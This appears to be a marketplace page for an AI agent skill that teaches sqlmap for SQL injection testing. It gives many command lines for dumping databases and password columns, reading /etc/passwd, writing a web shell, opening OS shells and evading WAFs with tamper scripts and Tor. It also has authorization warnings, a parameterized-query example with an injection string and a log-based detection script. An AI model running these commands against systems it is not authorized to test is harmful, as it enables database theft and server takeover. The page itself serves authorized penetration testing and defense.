webapp-sqlmap

Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.

242 stars

Best use case

webapp-sqlmap is best used when you need a repeatable AI agent workflow instead of a one-off prompt. It is especially useful for teams working in multi.

Users should expect a more consistent workflow output, faster repeated execution, and less time spent rewriting prompts from scratch.

Practical example

Example input

Use the "webapp-sqlmap" skill to help with this workflow task. Context: Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.

Example output

A structured workflow result with clearer steps, more consistent formatting, and an output that is easier to reuse in the next run.

When to use this skill

  • Use this skill when you want a reusable workflow rather than writing the same prompt again and again.

When not to use this skill

  • Do not use this when you only need a one-off answer and do not need a reusable workflow.
  • Do not use it if you cannot install or maintain the related files, repository context, or supporting tools.

Installation

Claude Code / Cursor / Codex

$ curl -o ~/.claude/skills/webapp-sqlmap/SKILL.md --create-dirs "https://raw.githubusercontent.com/aiskillstore/marketplace/main/skills/agentsecops/webapp-sqlmap/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/webapp-sqlmap/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How webapp-sqlmap Compares

| Feature / Agent | webapp-sqlmap | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |

Frequently Asked Questions

What does this skill do?

Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# SQLMap - Automated SQL Injection Tool

## Overview

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This skill covers authorized security testing including vulnerability detection, database enumeration, data extraction, and authentication bypass.

**IMPORTANT**: SQL injection exploitation is invasive and can corrupt data. Only use SQLMap with proper written authorization on systems you own or have explicit permission to test.

## Quick Start

Basic SQL injection detection:

```bash
# Test single parameter
sqlmap -u "http://example.com/page?id=1"

# Test with POST data
sqlmap -u "http://example.com/login" --data="username=admin&password=test"

# Test from saved request file
sqlmap -r request.txt

# Detect and enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs
```

## Core Workflow

### SQL Injection Testing Workflow

Progress:

- [ ] 1. Verify authorization for web application testing
- [ ] 2. Identify potential injection points
- [ ] 3. Detect SQL injection vulnerabilities
- [ ] 4. Determine DBMS type and version
- [ ] 5. Enumerate databases and tables
- [ ] 6. Extract sensitive data (if authorized)
- [ ] 7. Document findings with remediation guidance
- [ ] 8. Clean up any test artifacts

Work through each step systematically. Check off completed items.

### 1. Authorization Verification

**CRITICAL**: Before any SQL injection testing:
- Confirm written authorization from application owner
- Verify scope includes web application security testing
- Understand data protection and handling requirements
- Document allowed testing windows
- Confirm backup and rollback procedures

### 2. Target Identification

Identify potential SQL injection points:

**GET Parameters**:
```bash
# Single URL with parameter
sqlmap -u "http://example.com/product?id=1"

# Multiple parameters
sqlmap -u "http://example.com/search?query=test&category=all&sort=name"

# Widen coverage: higher --level also tests cookies and HTTP headers, higher --risk adds heavier payloads
sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3
```

**POST Requests**:
```bash
# POST data directly
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"

# From Burp Suite request file
sqlmap -r login_request.txt

# With additional headers
sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"
```

**Cookies and Headers**:
```bash
# Test cookies
sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user"

# Test custom headers
sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test"

# Test specific injection point
sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"
```

### 3. Detection and Fingerprinting

Detect SQL injection vulnerabilities:

```bash
# Basic detection
sqlmap -u "http://example.com/page?id=1"

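# Aggressive testing (higher risk): --risk=3 adds OR-based payloads, which can
# modify data if the injection point is in an UPDATE or DELETE statement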
sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3

# Specify technique
sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ

# Detect DBMS
sqlmap -u "http://example.com/page?id=1" --fingerprint

# Force specific DBMS
sqlmap -u "http://example.com/page?id=1" --dbms=mysql
```

**Injection Techniques**:
- **B**: Boolean-based blind
- **E**: Error-based
- **U**: UNION query-based
- **S**: Stacked queries
- **T**: Time-based blind
- **Q**: Inline queries

### 4. Database Enumeration

Enumerate database structure:

```bash
# List databases
sqlmap -u "http://example.com/page?id=1" --dbs

# Current database
sqlmap -u "http://example.com/page?id=1" --current-db

# List tables in database
sqlmap -u "http://example.com/page?id=1" -D database_name --tables

# List columns in table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns

# Database users
sqlmap -u "http://example.com/page?id=1" --users

# Database user privileges
sqlmap -u "http://example.com/page?id=1" --privileges
```

### 5. Data Extraction

Extract data from database (authorized only):

```bash
# Dump specific table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump

# Dump specific columns
sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump

# Dump all databases (use with caution)
sqlmap -u "http://example.com/page?id=1" --dump-all

# Exclude system databases
sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs

# Search for specific data
sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password
```

### 6. Advanced Exploitation

Advanced SQL injection techniques:

**File System Access**:
```bash
# Read file from server
sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"

# Write file to server (very invasive)
sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
```

**OS Command Execution** (requires stacked queries or out-of-band):
```bash
# Execute OS command
sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami"

# Get OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell

# Get SQL shell
sqlmap -u "http://example.com/page?id=1" --sql-shell
```

**Authentication Bypass**:
```bash
# Test login form parameters for injection
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"

# Test a page behind HTTP authentication (--auth-type and --auth-cred must be used together)
sqlmap -u "http://example.com/page?id=1" --auth-type=Basic --auth-cred="admin:password"
```

### 7. WAF Bypass and Evasion

Evade web application firewalls:

```bash
# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment

# Multiple tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between

# Random User-Agent
sqlmap -u "http://example.com/page?id=1" --random-agent

# Custom User-Agent
sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0..."

# Add delay between requests
sqlmap -u "http://example.com/page?id=1" --delay=2

# Use proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"

# Use Tor
sqlmap -u "http://example.com/page?id=1" --tor --check-tor
```

**Common Tamper Scripts**:
- `space2comment`: Replace space with comments
- `between`: Replace equals with BETWEEN
- `charencode`: URL encode characters
- `randomcase`: Random case for keywords
- `apostrophemask`: Replace apostrophe with UTF-8
- `equaltolike`: Replace equals with LIKE

## Security Considerations

### Authorization & Legal Compliance

- **Written Permission**: Obtain explicit authorization for SQL injection testing
- **Data Protection**: Handle extracted data per engagement rules
- **Scope Boundaries**: Only test explicitly authorized applications
- **Backup Verification**: Ensure backups exist before invasive testing
- **Production Systems**: Extra caution on production databases

### Operational Security

- **Rate Limiting**: Use --delay to avoid overwhelming applications
- **Session Management**: SQLMap stores session data per target and reuses it on the next run; use --flush-session to discard it and start fresh
- **Logging**: All SQLMap activity is logged to ~/.sqlmap/output/
- **Data Sanitization**: Redact sensitive data from reports
- **False Positives**: Verify findings manually

### Audit Logging

Document all SQL injection testing:
- Target URLs and parameters tested
- Injection techniques successful
- Databases and tables accessed
- Data extracted (summary only, not full data)
- Commands executed
- Tamper scripts and evasion used

### Compliance

- **OWASP Top 10**: A03:2021 - Injection
- **CWE-89**: SQL Injection
- **MITRE ATT&CK**: T1190 (Exploit Public-Facing Application)
- **PCI-DSS**: 6.5.1 - Injection flaws
- **ISO 27001**: A.14.2 Security in development

## Common Patterns

### Pattern 1: Basic Vulnerability Assessment

```bash
# Detect vulnerability
sqlmap -u "http://example.com/page?id=1" --batch

# Enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs --batch

# Get current user and privileges
sqlmap -u "http://example.com/page?id=1" --current-user --current-db --is-dba --batch
```

### Pattern 2: Authentication Bypass Testing

```bash
# Test login form
sqlmap -u "http://example.com/login" \
  --data="username=admin&password=test" \
  --level=5 --risk=3 \
  --technique=BE \
  --batch

# Attempt to extract admin credentials
sqlmap -u "http://example.com/login" \
  --data="username=admin&password=test" \
  -D app_db -T users -C username,password --dump \
  --batch
```

### Pattern 3: API Testing

```bash
# JSON API endpoint
sqlmap -u "http://api.example.com/user/1" \
  --headers="Content-Type: application/json\nAuthorization: Bearer token123" \
  --level=3 \
  --batch

# REST API with POST
sqlmap -u "http://api.example.com/search" \
  --data='{"query":"test","limit":10}' \
  --headers="Content-Type: application/json" \
  --batch
```

### Pattern 4: Comprehensive Enumeration

```bash
# Full enumeration (use with extreme caution)
sqlmap -u "http://example.com/page?id=1" \
  --banner \
  --current-user \
  --current-db \
  --is-dba \
  --users \
  --passwords \
  --privileges \
  --dbs \
  --batch
```

## Integration Points

### Burp Suite Integration

```bash
# Save request from Burp Suite as request.txt
# Right-click request → "Copy to file"

# Test with SQLMap
sqlmap -r request.txt --batch

# Use Burp as proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"
```

### Reporting and Output

```bash
# Save session data to a specific file
sqlmap -u "http://example.com/page?id=1" -s output.sqlite

# Resume: rerun with the same session file (stored results are reused automatically)
sqlmap -u "http://example.com/page?id=1" -s output.sqlite

# Custom output directory
sqlmap -u "http://example.com/page?id=1" --output-dir="/path/to/results"

# Verbose output
sqlmap -u "http://example.com/page?id=1" -v 3

# Traffic log
sqlmap -u "http://example.com/page?id=1" -t traffic.log
```

## Troubleshooting

### Issue: False Positives

**Solutions**:
```bash
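# Increase detection accuracy: match a string that appears only on the "true" page
sqlmap -u "http://example.com/page?id=1" --string="Welcome"

# Or match a string that appears only on the "false" page (cannot be combined with --string)
sqlmap -u "http://example.com/page?id=1" --not-string="Error"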

# Use specific technique
sqlmap -u "http://example.com/page?id=1" --technique=U

# Manual verification
sqlmap -u "http://example.com/page?id=1" --sql-query="SELECT version()"
```

### Issue: WAF Blocking Requests

**Solutions**:
```bash
# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between --random-agent

# Add delays
sqlmap -u "http://example.com/page?id=1" --delay=3

# Change HTTP method
sqlmap -u "http://example.com/page?id=1" --method=PUT
```

### Issue: Slow Performance

**Solutions**:
```bash
# Use threads (careful with application stability)
sqlmap -u "http://example.com/page?id=1" --threads=5

# Reduce testing scope
sqlmap -u "http://example.com/page?id=1" --level=1 --risk=1

# Test specific parameter only
sqlmap -u "http://example.com/page?id=1&name=test" -p id
```

## Defensive Considerations

Protect applications against SQL injection:

**Secure Coding Practices**:
- Use parameterized queries/prepared statements
- Employ ORM frameworks properly
- Validate and sanitize all user input
- Apply principle of least privilege to database accounts
- Disable error messages in production
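
The first two practices above, shown as an added example (not part of the original SKILL.md): a search handler for the `query`, `category` and `sort` parameters from the Target Identification URL, first with string concatenation and then with bound parameters plus an allow-list for the sort column. The `products` schema, function names and sample values are assumptions made for this example.

```python
import sqlite3

def make_db():
    # Constructed sample data; the schema is an assumption for this example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, "
               "category TEXT, price REAL)")
    db.executemany(
        "INSERT INTO products (name, category, price) VALUES (?, ?, ?)",
        [("anvil", "tools", 40.0), ("rope", "tools", 12.5), ("tent", "camping", 99.0)],
    )
    return db

def search_vulnerable(db, query, category, sort):
    # BEFORE: request values are concatenated into the SQL text, so the
    # database parses them as SQL. This is the flaw sqlmap detects.
    sql = ("SELECT name FROM products WHERE name LIKE '%" + query + "%' "
           "AND category = '" + category + "' ORDER BY " + sort)
    return [row[0] for row in db.execute(sql)]

# Identifiers cannot be bound as parameters, so map them through an allow-list.
SORT_COLUMNS = {"name": "name", "price": "price"}

def search_hardened(db, query, category, sort):
    # AFTER: values are bound with placeholders and never parsed as SQL.
    if sort not in SORT_COLUMNS:
        raise ValueError("unsupported sort column: %r" % sort)
    sql = ("SELECT name FROM products WHERE name LIKE ? AND category = ? "
           "ORDER BY " + SORT_COLUMNS[sort])
    return [row[0] for row in db.execute(sql, ("%" + query + "%", category))]

def demo():
    db = make_db()
    # Constructed malformed value for the category parameter.
    hostile = "tools' OR '1'='1"
    return {
        "normal": search_hardened(db, "", "tools", "name"),
        "vulnerable_hostile": search_vulnerable(db, "", hostile, "name"),
        "hardened_hostile": search_hardened(db, "", hostile, "name"),
    }

if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The concatenated version returns every row for the malformed category value, while the bound version treats it as a literal that matches nothing.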

**Web Application Firewall Rules**:
- Block common SQL injection patterns
- Implement rate limiting
- Monitor for suspicious query patterns
- Alert on multiple injection attempts

**Detection and Monitoring**:
- Log all database queries
- Monitor for unusual query patterns
- Alert on error-based injection attempts
- Detect time-based blind injection delays
- Monitor for UNION-based queries
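
A sketch of the monitoring items above, as an added example (not part of the original SKILL.md): it classifies web access-log lines by the technique names used on this page and alerts on clients with repeated hits. Because `--random-agent` and the tamper scripts listed earlier change how requests look, it normalizes the URI before matching rather than relying on the User-Agent alone. The signatures, threshold, function names and log lines are assumptions constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Heuristic signatures keyed by the technique they indicate (not a complete rule set).
SIGNATURES = {
    "union": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "time-based": re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    "error-based": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "boolean": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
}
SQLMAP_UA = re.compile(r"\bsqlmap/", re.I)  # sqlmap's default User-Agent prefix
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def normalize(uri):
    # Decode twice (double URL encoding) and turn inline comments into spaces,
    # so charencode- and space2comment-style rewrites hit the same signatures.
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(unquote_plus(uri)))

def classify(line):
    """Return (client_ip, [indicators]) for one combined-format log line, or None."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    text = normalize(m["uri"])
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    if SQLMAP_UA.search(m["ua"]):
        hits.append("sqlmap-user-agent")
    return m["ip"], hits

def alerts(lines, threshold=2):
    """Map each IP with at least `threshold` suspicious requests to its indicators."""
    count, seen = defaultdict(int), defaultdict(set)
    for ip, hits in filter(None, map(classify, lines)):
        if hits:
            count[ip] += 1
            seen[ip].update(hits)
    return {ip: sorted(seen[ip]) for ip in count if count[ip] >= threshold}

# Constructed sample lines (documentation IP ranges, made-up version string).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2025:10:00:00 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2025:10:00:01 +0000] "GET /page?id=1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 512 "-" "sqlmap/1.0 (https://sqlmap.org)"',
    '198.51.100.7 - - [10/Jan/2025:10:00:03 +0000] "GET /page?id=1/**/AND/**/SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2025:10:00:09 +0000] "GET /page?id=1%2520AND%25201%253D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, indicators in alerts(SAMPLE_LOG).items():
        print(ip, indicators)
```

Time-based blind injection also shows up as response latency, which this log format does not carry; a log with request duration would let the same loop flag slow responses on parameterised URLs.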

## References

- [SQLMap Official Documentation](https://sqlmap.org/)
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html)
- [SQLMap Tamper Scripts](https://github.com/sqlmapproject/sqlmap/tree/master/tamper)
- [PTES: Vulnerability Analysis](http://www.pentest-standard.org/index.php/Vulnerability_Analysis)
